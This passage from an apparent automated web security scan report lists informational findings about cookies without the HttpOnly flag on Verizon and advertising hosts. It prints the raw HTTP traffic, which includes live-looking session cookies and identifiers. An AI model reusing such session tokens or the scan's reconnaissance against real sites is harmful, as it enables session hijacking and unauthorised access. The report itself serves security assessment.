Date: Mon, 05 Sep 2011 22:22:43 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

GIF89a.............!.......,...........D..;

10.65. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/tooltip_button.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/tooltip_button.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 133
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: "85-4e228b00"
Accept-Ranges: bytes
Cache-Control: private, max-age=7141
Date: Mon, 05 Sep 2011 22:25:25 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:25 GMT

GIF89a....    .............DDD...UUU...........................!.....    .,.........20.@k.)..;......a..\a....hP.....1t)..%.....I..X....;

10.66. https://enterprisecenter.verizon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: /enterprisesolutions/Default/favicon.ico
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:25:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:22 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT
Content-Length: 0


10.67. http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.verizon.com
Path:   /t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248 HTTP/1.1
Host: forums.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=1597650297; Domain=.verizon.com; Expires=Fri, 05-Sep-2014 16:09:13 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 194018
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

10.68. http://g-pixel.invitemedia.com/gmatcher

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gmatcher?id=CAESEDlps0WDQzL_sGCOCdezGYM&cver=1 HTTP/1.1
Host: g-pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: segments_p1="eJzjYuFY1sjMxcIx9w+IXHiHEUjufg0ij31n4mLmWJsHZHZ2MHNxcjwIF7gz5/BnFqDADrCK3uNMQPLMexB7H1jkywdGoJ7nuUDmzo8g5j8OIPM0WMXG9SwAmsIfSg=="; exchange_uid=eyIyIjogWyI3ODYxMjY3NDUwNTIyMTIwMTc4IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM1M119; uid=776b70d9-5df4-4d1b-98af-982dd1709cac; subID="{}"; impressions="{\"726143\": [1312827315+ \"01026648-7049-425e-a7ce-9a7cb258a341\"+ 70243+ 29835+ 1365]+ \"778530\": [1312501863+ \"7260679259817030178\"+ 162013+ 105345+ 12332]}"; camp_freq_p1="eJzjkuH4dZZZgFFi8/mGTywKjBrvQbQBowWYzyXCca2PHSj7/MGbjywKDBoMBgwWDAD8gxIK"; io_freq_p1="eJzjEuZY5SzAKLH5fMMnFgNGCzDNJczRmgEUfP7gzUcWBQYNBgMGCwYAJnoNKA=="; dp_rec="{\"2\": 1312827317+ \"4\": 1312827314}"; partnerUID="eyIxMTUiOiBbIjRlMzcxMDQ0MzJmZTExNDgiLCB0cnVlXSwgIjE5OSI6IFsiQkI0MEFFQTI5RUFFQjNGMDBCOTI1ODkzOUZDMEQ3RjMiLCB0cnVlXSwgIjE2OSI6IFsiNGUzNzEwNDQzMmZlMTE0OCIsIHRydWVdLCAiODQiOiBbIkVhemJWWUdKOTk5cjZZa20iLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 05 Sep 2011 22:14:41 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 05-Sep-2011 22:14:21 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: exchange_uid=eyIyIjogWyI3ODYxMjY3NDUwNTIyMTIwMTc4IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM4NV19; Domain=invitemedia.com; expires=Tue, 04-Sep-2012 22:14:41 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.69. http://get.adobe.com/cfusion/search/buddy/searchbuddy.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://get.adobe.com
Path:   /cfusion/search/buddy/searchbuddy.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfusion/search/buddy/searchbuddy.cfm?pre=xs&s=get:flashplayer&loc=en_us HTTP/1.1
Host: get.adobe.com
Proxy-Connection: keep-alive
Referer: http://get.adobe.com/flashplayer/
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SETTINGS.LOCALE=en%5Fus; storeregion=; s_vi=[CS]v1|272F173A85013C4B-60000106C0356B2B[CE]; UID=408BD657%2DBBDF%2DB561%2D47843A1059325B5B; op537volumelicensinggum=a00c02502m278vr07v3a22278vr08138v87c9; AWID=172.26.150.8.1314799484806; company_history=%5B%5B%22http%3A//support.muse.adobe.com/muse%22%2C%22Muse%22%5D%5D; is_human=true; mbox=PC#1314797047557-324714.19#1316024271|session#1314813238023-632011#1314816531|disable#browser%20timeout#1314817080|check#true#1314814731; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1315279224659_929552","ru":"http://phones.verizonwireless.com/htc/thunderbolt/","r":"phones.verizonwireless.com","st":"","cp":{"downloads":"get"},"pv":2,"to":3.3,"c":"http://get.adobe.com/flashplayer/","lc":{"d0":{"v":2,"s":true,"e":2}},"cd":0,"sd":0,"f":1315279228499}

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:34 GMT
Server: JRun Web Server
Cache-Control: max-age=1800
Content-Type: text/html; charset=UTF-8
Set-Cookie: DylanApp-BigIP=1447851018.27680.0000; path=/
Content-Length: 32

{"SUGGESTIONS":[],"HUBLETS":[]}

10.70. http://get.adobe.com/flashplayer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://get.adobe.com
Path:   /flashplayer/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flashplayer/ HTTP/1.1
Host: get.adobe.com
Proxy-Connection: keep-alive
Referer: http://phones.verizonwireless.com/htc/thunderbolt/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: storeregion=; s_vi=[CS]v1|272F173A85013C4B-60000106C0356B2B[CE]; UID=408BD657%2DBBDF%2DB561%2D47843A1059325B5B; op537volumelicensinggum=a00c02502m278vr07v3a22278vr08138v87c9; AWID=172.26.150.8.1314799484806; company_history=%5B%5B%22http%3A//support.muse.adobe.com/muse%22%2C%22Muse%22%5D%5D; is_human=true; mbox=PC#1314797047557-324714.19#1316024271|session#1314813238023-632011#1314816531|disable#browser%20timeout#1314817080|check#true#1314814731

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:20 GMT
Server: JRun Web Server
Content-Type: text/html; charset=UTF-8
Cache-Control: private, no-store, no-cache
Content-Language: en-US
Content-Language: en-US
Set-Cookie: SETTINGS.LOCALE=en%5Fus;domain=.adobe.com;expires=Wed, 28-Aug-2041 22:20:21 GMT;path=/cfusion/
Content-Length: 27953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="EN_US">
<he
...[SNIP]...

10.71. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/Core.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/js/com/bea/portal/tools/js/Core.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /headlines/js/com/bea/portal/tools/js/Core.jsp HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 83
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; path=/

__BEA.com.bea.portal.tools.js.Core.set('__BEA.request.contextPath', '/headlines')

10.72. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 1181
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/javascript; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:35 GMT
Connection: close
Set-Cookie: NEWSROOMDOTCOMAPPID=7bSLTlQhs2y2M1zZJrqhtyTDLWGScGvNhMT9hlxzfQnmhhvJsQzr!1136409313; path=/


__BEA.com.bea.portal.tools.js.Core.set("__BEA.com.bea.portal.tools.js.Constants", new Object())

<!-- value of request.getContextPath() -->
__BEA.com.bea.portal.tools.js.Constants.CONTEXT_PATH = '/he
...[SNIP]...

10.73. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=5d69f842-0719-4c5b-961b-9400c8d4e652 HTTP/1.1
Host: idcs.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: T=1; uid=u=b302c5d5-65f2-40f8-a929-cb62b8ddcae9; sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383; tpd=e20=1315359826890&e90=1313372627004&e50=1315359827084&e100=1313372627366

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383&11095=734384; domain=.interclick.com; expires=Sun, 05-Sep-2021 22:14:39 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 05 Sep 2011 22:14:38 GMT

GIF89a.............!.......,...........D..;

10.74. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=verizonlb_cs=1&betq=12605=431339 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=7656746518332.511?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 22:16:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 04-Sep-2013 22:16:10 GMT; path=/
Set-Cookie: F1=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: BASE=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ROLL=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: aceRTB=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 05 Sep 2011 23:16:10 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.75. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=verizonlb_cs=1&betq=12605=431339 HTTP/1.1
Host: leadback.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
